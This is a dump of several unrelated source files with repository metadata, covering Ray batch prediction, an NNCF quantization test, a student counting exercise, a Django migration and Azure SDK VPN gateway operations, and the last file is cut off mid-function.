def _predict_pandas(self, df, **kwargs) -> "pd.DataFrame":
return pandas_udf(df, **kwargs)
return cls(
checkpoint=Checkpoint.from_dict({"dummy": 1}),
predictor_cls=PandasUDFPredictor,
)
def get_preprocessor(self) -> Preprocessor:
"""Get the preprocessor to use prior to executing predictions."""
if self._override_preprocessor_set:
return self._override_preprocessor
return self._checkpoint.get_preprocessor()
def set_preprocessor(self, preprocessor: Preprocessor) -> None:
"""Set the preprocessor to use prior to executing predictions."""
self._override_preprocessor = preprocessor
self._override_preprocessor_set = True
def predict(
self,
data: Union[ray.data.Dataset, ray.data.DatasetPipeline],
*,
feature_columns: Optional[List[str]] = None,
keep_columns: Optional[List[str]] = None,
batch_size: int = 4096,
min_scoring_workers: int = 1,
max_scoring_workers: Optional[int] = None,
num_cpus_per_worker: Optional[int] = None,
num_gpus_per_worker: Optional[int] = None,
separate_gpu_stage: bool = True,
ray_remote_args: Optional[Dict[str, Any]] = None,
**predict_kwargs,
) -> Union[ray.data.Dataset, ray.data.DatasetPipeline]:
"""Run batch scoring on a Dataset.
.. note::
In Ray 2.4, `BatchPredictor` is lazy by default. Use one of the Datasets consumption APIs, such as iterating through the output, to trigger the execution of prediction.
Args:
data: Ray dataset or pipeline to run batch prediction on.
feature_columns: List of columns in the preprocessed dataset to use for
prediction. Columns not specified will be dropped
from `data` before being passed to the predictor.
If None, use all columns in the preprocessed dataset.
keep_columns: List of columns in the preprocessed dataset to include
in the prediction result. This is useful for calculating final
accuracies/metrics on the result dataset. If None,
the columns in the output dataset will contain
just the prediction results.
batch_size: Split dataset into batches of this size for prediction.
min_scoring_workers: Minimum number of scoring actors.
max_scoring_workers: If set, specify the maximum number of scoring actors.
num_cpus_per_worker: Number of CPUs to allocate per scoring worker.
Set to 1 by default.
num_gpus_per_worker: Number of GPUs to allocate per scoring worker.
Set to 0 by default. If you want to use GPUs for inference, please
specify this parameter.
separate_gpu_stage: If using GPUs, specifies whether to execute GPU
processing in a separate stage (enabled by default). This avoids
running expensive preprocessing steps on GPU workers.
ray_remote_args: Additional resource requirements to request from
ray.
predict_kwargs: Keyword arguments passed to the predictor's
``predict()`` method.
Returns:
Dataset containing scoring results.
Examples:
.. testcode::
import pandas as pd
import ray
from ray.train.batch_predictor import BatchPredictor
def calculate_accuracy(df):
return pd.DataFrame({"correct": df["preds"] == df["label"]})
# Create a batch predictor that returns identity as the predictions.
batch_pred = BatchPredictor.from_pandas_udf(
lambda data: pd.DataFrame({"preds": data["feature_1"]}))
# Create a dummy dataset.
ds = ray.data.from_pandas(pd.DataFrame({
"feature_1": [1, 2, 3], "label": [1, 2, 3]}))
# Execute batch prediction using this predictor.
predictions = batch_pred.predict(ds,
feature_columns=["feature_1"], keep_columns=["label"])
# print predictions and calculate final accuracy
print(predictions)
correct = predictions.map_batches(calculate_accuracy)
print(f"Final accuracy: {correct.sum(on='correct') / correct.count()}")
.. testoutput::
MapBatches(ScoringWrapper)
+- Dataset(num_blocks=1, num_rows=3, schema={feature_1: int64, label: int64})
Final accuracy: 1.0
""" # noqa: E501
if num_gpus_per_worker is None:
num_gpus_per_worker = 0
if num_cpus_per_worker is None:
if num_gpus_per_worker > 0:
# Don't request a CPU here, to avoid unnecessary contention. The GPU
# resource request suffices for scheduling.
num_cpus_per_worker = 0
else:
num_cpus_per_worker = 1
predictor_cls = self._predictor_cls
checkpoint_ref = self._checkpoint_ref
# Automatic set use_gpu in predictor constructor if user provided
# explicit GPU resources
if (
"use_gpu" in inspect.signature(predictor_cls.from_checkpoint).parameters
and "use_gpu" not in self._predictor_kwargs
and num_gpus_per_worker > 0
):
logger.info(
"`num_gpus_per_worker` is set for `BatchPreditor`."
"Automatically enabling GPU prediction for this predictor. To "
"disable set `use_gpu` to `False` in `BatchPredictor.predict`."
)
self._predictor_kwargs["use_gpu"] = True
predictor_kwargs_ref = ray.put(self._predictor_kwargs)
# In case of [arrow block] -> [X] -> [Pandas UDF] -> [Y] -> [TorchPredictor]
# We have two places where we can chose data format with less conversion cost.
# This is the [X], between data block and first preprocessor.
preprocessor_batch_format: BatchFormat = (
self._determine_preprocessor_batch_format(data)
)
# This is the [Y] in case of separated GPU stage prediction
predict_stage_batch_format: BatchFormat = (
self._predictor_cls._batch_format_to_use()
)
ctx = DatasetContext.get_current()
cast_tensor_columns = ctx.enable_tensor_extension_casting
class ScoringWrapper:
def __init__(self, override_prep: Preprocessor = None):
checkpoint = ray.get(checkpoint_ref)
predictor_kwargs = ray.get(predictor_kwargs_ref)
self._predictor = predictor_cls.from_checkpoint(
checkpoint, **predictor_kwargs
)
if cast_tensor_columns:
# Enable automatic tensor column casting at UDF boundaries.
self._predictor._set_cast_tensor_columns()
# We want preprocessing to happen before feature column selection.
# So we manually apply preprocessing in BatchPredictor rather
# than in Predictor.
self.override_prep = override_prep
self._predictor.set_preprocessor(None)
def _select_columns_from_input_batch(
self,
batch_data: DataBatchType,
select_columns: Optional[List[str]] = None,
):
"""Return a subset of input batch based on provided columns."""
# No select columns specified, use all columns.
if not select_columns:
return batch_data
elif isinstance(batch_data, np.ndarray):
raise ValueError(
f"Column name(s) {select_columns} should not be provided "
"for prediction input data type of ``numpy.ndarray``"
)
elif isinstance(batch_data, dict):
return {k: v for k, v in batch_data.items() if k in select_columns}
elif isinstance(batch_data, pd.DataFrame):
# Select a subset of the pandas columns.
return batch_data[select_columns]
def _keep_columns_from_input_batch(
self,
input_batch: DataBatchType,
prediction_output_batch: DataBatchType,
keep_columns: Optional[List[str]] = None,
):
"""Return a union of input batch and prediction output batch
based on provided columns.
"""
if not keep_columns:
return prediction_output_batch
elif isinstance(input_batch, np.ndarray):
raise ValueError(
f"Column name(s) {keep_columns} should not be provided "
"for prediction input data type of ``numpy.ndarray``"
)
elif isinstance(input_batch, dict):
for column in keep_columns:
prediction_output_batch[column] = input_batch[column]
return prediction_output_batch
elif isinstance(input_batch, pd.DataFrame):
prediction_output_batch[keep_columns] = input_batch[keep_columns]
return prediction_output_batch
def __call__(self, input_batch: DataBatchType) -> DataBatchType:
# TODO: Delegate separate_gpu_stage flag to Datasets.
if self.override_prep:
# Apply preprocessing before selecting feature columns.
input_batch = self.override_prep.transform_batch(input_batch)
# TODO (jiaodong): Investigate if there's room to optimize prediction
# result joins to minimize GPU <> CPU transfer
prediction_batch: DataBatchType = self._select_columns_from_input_batch(
input_batch, select_columns=feature_columns
)
prediction_output_batch: DataBatchType = self._predictor.predict(
prediction_batch, **predict_kwargs
)
prediction_output_batch: DataBatchType = (
self._keep_columns_from_input_batch(
input_batch, prediction_output_batch, keep_columns=keep_columns
)
)
return prediction_output_batch
compute = ray.data.ActorPoolStrategy(
min_size=min_scoring_workers, max_size=max_scoring_workers
)
ray_remote_args = ray_remote_args or {}
ray_remote_args["num_cpus"] = num_cpus_per_worker
ray_remote_args["num_gpus"] = num_gpus_per_worker
preprocessor = self.get_preprocessor()
override_prep = None
if preprocessor:
# TODO: Delegate separate_gpu_stage flag to Datasets.
if not separate_gpu_stage and num_gpus_per_worker > 0:
override_prep = preprocessor
else:
# In batch prediction, preprocessing is always done in a separate stage.
# We should not in-line it with prediction, unless separate_gpu_stage is
# False.
# Dataset optimizer will fuse preprocessing+prediction stage as
# necessary.
if isinstance(data, Dataset):
# Dataset is lazy by default so this transform
# will not trigger execution.
data = preprocessor.transform(data)
elif isinstance(data, DatasetPipeline):
data = preprocessor._transform_pipeline(data)
prediction_results = data.map_batches(
ScoringWrapper,
compute=compute,
batch_format=preprocessor_batch_format
if override_prep is not None
else predict_stage_batch_format,
batch_size=batch_size,
prefetch_batches=int(num_gpus_per_worker > 0),
fn_constructor_kwargs={"override_prep": override_prep},
**ray_remote_args,
)
return prediction_results
def predict_pipelined(
self,
data: ray.data.Dataset,
*,
blocks_per_window: Optional[int] = None,
bytes_per_window: Optional[int] = None,
# The remaining args are from predict().
feature_columns: Optional[List[str]] = None,
keep_columns: Optional[List[str]] = None,
batch_size: int = 4096,
min_scoring_workers: int = 1,
max_scoring_workers: Optional[int] = None,
num_cpus_per_worker: Optional[int] = None,
num_gpus_per_worker: Optional[int] = None,
separate_gpu_stage: bool = True,
ray_remote_args: Optional[Dict[str, Any]] = None,
**predict_kwargs,
) -> ray.data.DatasetPipeline:
"""Setup a prediction pipeline for batch scoring.
Unlike `predict()`, this generates a DatasetPipeline object and does not
perform execution. Execution can be triggered by pulling from the pipeline.
This is a convenience wrapper around calling `.window()` on the Dataset prior
to passing it `BatchPredictor.predict()`.
Args:
data: Ray dataset to run batch prediction on.
blocks_per_window: The window size (parallelism) in blocks.
Increasing window size increases pipeline throughput, but also
increases the latency to initial output, since it decreases the
length of the pipeline. Setting this to infinity effectively
disables pipelining.
bytes_per_window: Specify the window size in bytes instead of blocks.
This will be treated as an upper bound for the window size, but each
window will still include at least one block. This is mutually
exclusive with ``blocks_per_window``.
feature_columns: List of columns in data to use for prediction. Columns not
specified will be dropped from `data` before being passed to the
predictor. If None, use all columns.
keep_columns: List of columns in `data` to include in the prediction result.
This is useful for calculating final accuracies/metrics on the result
dataset. If None, the columns in the output dataset will contain just
the prediction results.
batch_size: Split dataset into batches of this size for prediction.
min_scoring_workers: Minimum number of scoring actors.
max_scoring_workers: If set, specify the maximum number of scoring actors.
num_cpus_per_worker: Number of CPUs to allocate per scoring worker.
num_gpus_per_worker: Number of GPUs to allocate per scoring worker.
separate_gpu_stage: If using GPUs, specifies whether to execute GPU
processing in a separate stage (enabled by default). This avoids
running expensive preprocessing steps on GPU workers.
ray_remote_args: Additional resource requirements to request from
ray.
predict_kwargs: Keyword arguments passed to the predictor's
``predict()`` method.
Returns:
DatasetPipeline that generates scoring results.
Examples:
.. testcode::
import pandas as pd
import ray
from ray.train.batch_predictor import BatchPredictor
# Create a batch predictor that always returns `42` for each input.
batch_pred = BatchPredictor.from_pandas_udf(
lambda data: pd.DataFrame({"a": [42] * len(data)}))
# Create a dummy dataset.
ds = ray.data.range_tensor(1000, parallelism=4)
# Setup a prediction pipeline.
print(batch_pred.predict_pipelined(ds, blocks_per_window=1))
.. testoutput::
DatasetPipeline(num_windows=4, num_stages=3)
"""
if blocks_per_window is None and bytes_per_window is None:
raise ValueError(
"It is required to specify one of `blocks_per_window` or "
"`bytes_per_window`."
)
pipe = data.window(
blocks_per_window=blocks_per_window, bytes_per_window=bytes_per_window
)
return self.predict(
pipe,
batch_size=batch_size,
feature_columns=feature_columns,
keep_columns=keep_columns,
min_scoring_workers=min_scoring_workers,
max_scoring_workers=max_scoring_workers,
num_cpus_per_worker=num_cpus_per_worker,
num_gpus_per_worker=num_gpus_per_worker,
separate_gpu_stage=separate_gpu_stage,
ray_remote_args=ray_remote_args,
**predict_kwargs,
)
def _determine_preprocessor_batch_format(
self, ds: Union[ray.data.Dataset, ray.data.DatasetPipeline]
) -> BatchFormat:
"""Determine batch format we use for the first preprocessor.
In case of [arrow block] -> [X] -> [Pandas/Numpy UDF] -> [Predictor]
We choose the best X based on dataset block format and preprocessor's
transform type to avoid unnecessary data conversion.
Args:
ds (Union[ray.data.Dataset, ray.data.DatasetPipeline]): Input
dataset or dataset pipeline.
Returns:
BatchFormat: Batch format to use for the preprocessor.
"""
preprocessor = self.get_preprocessor()
if preprocessor is None:
# No preprocessor, just use the predictor format.
return self._predictor_cls._batch_format_to_use()
# Code dealing with Chain preprocessor is in Chain._determine_transform_to_use
# Use same batch format as first preprocessor to minimize data copies.
return preprocessor._determine_transform_to_use()
| [
"noreply@github.com"
] | AmeerHajAli.noreply@github.com |
2c16aae7055c557dfb20f94c0770926fb487a646 | 62179a165ec620ba967dbc20016e890978fbff50 | /tests/onnx/quantization/test_min_max.py | f5f1710268d9668c58b04281785182c4aa05cfd7 | [
"Apache-2.0"
] | permissive | openvinotoolkit/nncf | 91fcf153a96f85da166aacb7a70ca4941e4ba4a4 | c027c8b43c4865d46b8de01d8350dd338ec5a874 | refs/heads/develop | 2023-08-24T11:25:05.704499 | 2023-08-23T14:44:05 | 2023-08-23T14:44:05 | 263,687,600 | 558 | 157 | Apache-2.0 | 2023-09-14T17:06:41 | 2020-05-13T16:41:05 | Python | UTF-8 | Python | false | false | 8,238 | py | # Copyright (c) 2023 Intel Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from typing import List
import pytest
import nncf.onnx.graph.metatypes.onnx_metatypes as om
from nncf.common.graph.graph import NNCFNode
from nncf.common.graph.transformations.commands import TargetType
from nncf.onnx.graph.nncf_graph_builder import ONNXLayerAttributes
from nncf.onnx.graph.node_utils import get_quantization_axis
from nncf.onnx.graph.node_utils import get_reduction_shape
from nncf.onnx.graph.transformations.commands import ONNXTargetPoint
# pylint: disable=protected-access
@dataclass
class TestCase:
nncf_node: NNCFNode
target_point: ONNXTargetPoint
per_channel: bool
ref_reduction_shape: List[int]
test_cases = (
TestCase(
nncf_node=NNCFNode(
{
NNCFNode.ID_NODE_ATTR: 0,
NNCFNode.NODE_NAME_ATTR: "conv_with_weight_per_tensor",
NNCFNode.METATYPE_ATTR: om.ONNXConvolutionMetatype,
NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(weight_attrs={1: {"shape": [3, 5, 8]}}),
}
),
target_point=ONNXTargetPoint(
target_type=TargetType.OPERATION_WITH_WEIGHTS,
target_node_name="conv_with_weight_per_tensor",
port_id=1,
),
per_channel=False,
ref_reduction_shape=None,
),
TestCase(
nncf_node=NNCFNode(
{
NNCFNode.ID_NODE_ATTR: 0,
NNCFNode.NODE_NAME_ATTR: "conv_with_weight_per_channel",
NNCFNode.METATYPE_ATTR: om.ONNXConvolutionMetatype,
NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(weight_attrs={1: {"shape": [3, 5, 8]}}),
}
),
target_point=ONNXTargetPoint(
target_type=TargetType.OPERATION_WITH_WEIGHTS,
target_node_name="gemm_with_weight_per_channel_0_port",
port_id=1,
),
per_channel=True,
ref_reduction_shape=(1, 2),
),
TestCase(
nncf_node=NNCFNode(
{
NNCFNode.ID_NODE_ATTR: 0,
NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_tensor",
NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(weight_attrs={1: {"shape": [5, 8]}}),
}
),
target_point=ONNXTargetPoint(
target_type=TargetType.OPERATION_WITH_WEIGHTS,
target_node_name="gemm_with_weight_per_tensor",
port_id=1,
),
per_channel=False,
ref_reduction_shape=None,
),
TestCase(
nncf_node=NNCFNode(
{
NNCFNode.ID_NODE_ATTR: 0,
NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel",
NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(weight_attrs={1: {"shape": [5, 8]}}),
}
),
target_point=ONNXTargetPoint(
target_type=TargetType.OPERATION_WITH_WEIGHTS,
target_node_name="gemm_with_weight_per_channel_0_port",
port_id=1,
),
per_channel=True,
ref_reduction_shape=(0,),
),
TestCase(
nncf_node=NNCFNode(
{
NNCFNode.ID_NODE_ATTR: 0,
NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel_extra_attrs",
NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(
weight_attrs={1: {"shape": [5, 8]}}, node_attrs={"transA": 0, "transB": 0}
),
}
),
target_point=ONNXTargetPoint(
target_type=TargetType.OPERATION_WITH_WEIGHTS,
target_node_name="gemm_with_weight_per_channel_extra_attrs",
port_id=1,
),
per_channel=True,
ref_reduction_shape=(0,),
),
TestCase(
nncf_node=NNCFNode(
{
NNCFNode.ID_NODE_ATTR: 0,
NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel_extra_attrs",
NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(
weight_attrs={1: {"shape": [5, 8]}}, node_attrs={"transA": 1, "transB": 0}
),
}
),
target_point=ONNXTargetPoint(
target_type=TargetType.OPERATION_WITH_WEIGHTS,
target_node_name="gemm_with_weight_per_channel_extra_attrs",
port_id=1,
),
per_channel=True,
ref_reduction_shape=(0,),
),
TestCase(
nncf_node=NNCFNode(
{
NNCFNode.ID_NODE_ATTR: 0,
NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel_transpose",
NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(
weight_attrs={1: {"shape": [5, 8]}}, node_attrs={"transA": 0, "transB": 1}
),
}
),
target_point=ONNXTargetPoint(
target_type=TargetType.OPERATION_WITH_WEIGHTS,
target_node_name="gemm_with_weight_per_channel_transpose",
port_id=1,
),
per_channel=True,
ref_reduction_shape=(1,),
),
TestCase(
nncf_node=NNCFNode(
{
NNCFNode.ID_NODE_ATTR: 0,
NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel_transpose_one_dim",
NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(
weight_attrs={1: {"shape": [5]}}, node_attrs={"transA": 0, "transB": 1}
),
}
),
target_point=ONNXTargetPoint(
target_type=TargetType.OPERATION_WITH_WEIGHTS,
target_node_name="gemm_with_weight_per_channel_0_port",
port_id=1,
),
per_channel=True,
ref_reduction_shape=(0,),
),
TestCase(
nncf_node=NNCFNode(
{
NNCFNode.ID_NODE_ATTR: 0,
NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel_0_port",
NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(
weight_attrs={0: {"shape": [10, 10, 5]}}, node_attrs={"transA": 0, "transB": 1}
),
}
),
target_point=ONNXTargetPoint(
target_type=TargetType.OPERATION_WITH_WEIGHTS,
target_node_name="gemm_with_weight_per_channel_0_port",
port_id=0,
),
per_channel=True,
ref_reduction_shape=(0, 1),
),
)
@pytest.mark.parametrize(
"test_case",
(test_cases),
ids=[test_case.nncf_node.node_name for test_case in test_cases],
)
def test_get_reduction_shape(test_case):
"""Checks the correct return reduction shape in ONNXMinMaxAlgo.
Edge cases:
1) per-tensor.
2) transpose axis of GEMM node.
3) one dimensional weight tensor.
"""
quantization_axis = get_quantization_axis(
is_per_channel=test_case.per_channel, node=test_case.nncf_node, target_point=test_case.target_point
)
if quantization_axis is not None: # Per-Channel
reduction_shape = get_reduction_shape(
test_case.nncf_node.layer_attributes.weight_attrs[test_case.target_point.port_id]["shape"],
quantization_axis,
)
assert reduction_shape == test_case.ref_reduction_shape
else:
assert not test_case.per_channel
| [
"noreply@github.com"
] | openvinotoolkit.noreply@github.com |
2ccc9be68390f86c4dc72a2aed2aba3c9e87f173 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_169/ch146_2020_04_12_17_11_21_542240.py | 756543924c51ab18f1a1af082e34978cca04a01f | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 542 | py |
def conta_ocorrencias(lista):
lista2=[]
lista3=[]
for i in range(len(lista)):
lista.count(lista[i])
lista3.append( lista.count(lista[i]) )
for i in lista3:
if lista3.count(i)>1:
lista3.remove(i)
for i in lista:
if lista.count(i)>1:
lista.remove(i)
for i in range(len(lista)):
lista2.append(lista[i])
list(zip(lista2,lista3))
dict(zip(lista2,lista3))
return dict(zip(lista2,lista3))
| [
"you@example.com"
] | you@example.com |
e66245d10fdc516e42f9e199e11f20956954434a | 490f5e517942f529ddc8c1e0d421a208ff1ca29b | /02_code/exctools.py | 828134802f8e1fac0826f0e6ff3cd498809b3b4f | [] | no_license | emnglang/py-lab | facdc464a8c84b90f06b5cb639315981c0b4ba8d | bc3566da81e0b2cfa9ce563ffc198d35294971a1 | refs/heads/master | 2020-03-25T15:10:42.856062 | 2018-08-24T14:54:33 | 2018-08-24T14:54:33 | 143,869,343 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | import sys, traceback
def safe(callee, *pargs, **kargs):
try:
callee(*pargs, **kargs) # Catch everything else
except: # Or "except Exception as E:"
traceback.print_exc()
print('Got %s %s' % (sys.exc_info()[0], sys.exc_info()[1]))
if __name__ == '__main__':
import oops2
safe(oops2.oops)
| [
"linja1688@gmail.com"
] | linja1688@gmail.com |
5cb5b24b3295a6a98df8c170a567fba75aec2d0a | 2387b5ecf12d9a17976e049e4adbf739edafc830 | /core/migrations/0002_auto_20150511_1223.py | 79c7b2c9754a0743a3a1d31bc73b26c92766009c | [] | no_license | nathananderson03/britdoc | 3ce0b1141a648fce30056ca32fd8665ed6cf4971 | ddb921ed82088abbacdbb625baf3c9cae7987ccb | refs/heads/master | 2021-01-17T06:29:23.812112 | 2016-07-20T16:39:25 | 2016-07-20T16:39:25 | 63,797,054 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='film',
name='production_year',
field=models.IntegerField(default=2015, verbose_name='Year of Completion', choices=[(1990, 1990), (1991, 1991), (1992, 1992), (1993, 1993), (1994, 1994), (1995, 1995), (1996, 1996), (1997, 1997), (1998, 1998), (1999, 1999), (2000, 2000), (2001, 2001), (2002, 2002), (2003, 2003), (2004, 2004), (2005, 2005), (2006, 2006), (2007, 2007), (2008, 2008), (2009, 2009), (2010, 2010), (2011, 2011), (2012, 2012), (2013, 2013), (2014, 2014), (2015, 2015)]),
),
]
| [
"nathan.andersson03@gmail.com"
] | nathan.andersson03@gmail.com |
c31c91ed02b3b406ade47cb88de60578a93060eb | c50e7eb190802d7849c0d0cea02fb4d2f0021777 | /src/virtual-wan/azext_vwan/vendored_sdks/v2018_08_01/v2018_08_01/operations/_vpn_gateways_operations.py | f9e506122818fb40211f9df5ce5ae9e5dd697de3 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | Azure/azure-cli-extensions | c1615b19930bba7166c282918f166cd40ff6609c | b8c2cf97e991adf0c0a207d810316b8f4686dc29 | refs/heads/main | 2023-08-24T12:40:15.528432 | 2023-08-24T09:17:25 | 2023-08-24T09:17:25 | 106,580,024 | 336 | 1,226 | MIT | 2023-09-14T10:48:57 | 2017-10-11T16:27:31 | Python | UTF-8 | Python | false | false | 30,202 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VpnGatewaysOperations(object):
"""VpnGatewaysOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get(
self,
resource_group_name, # type: str
gateway_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.VpnGateway"
"""Retrieves the details of a virtual wan vpn gateway.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VpnGateway, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_08_01.models.VpnGateway
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
gateway_name, # type: str
vpn_gateway_parameters, # type: "_models.VpnGateway"
**kwargs # type: Any
):
# type: (...) -> "_models.VpnGateway"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(vpn_gateway_parameters, 'VpnGateway')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
gateway_name, # type: str
vpn_gateway_parameters, # type: "_models.VpnGateway"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VpnGateway"]
"""Creates a virtual wan vpn gateway if it doesn't exist else updates the existing gateway.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param vpn_gateway_parameters: Parameters supplied to create or Update a virtual wan vpn
gateway.
:type vpn_gateway_parameters: ~azure.mgmt.network.v2018_08_01.models.VpnGateway
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VpnGateway or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_08_01.models.VpnGateway]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
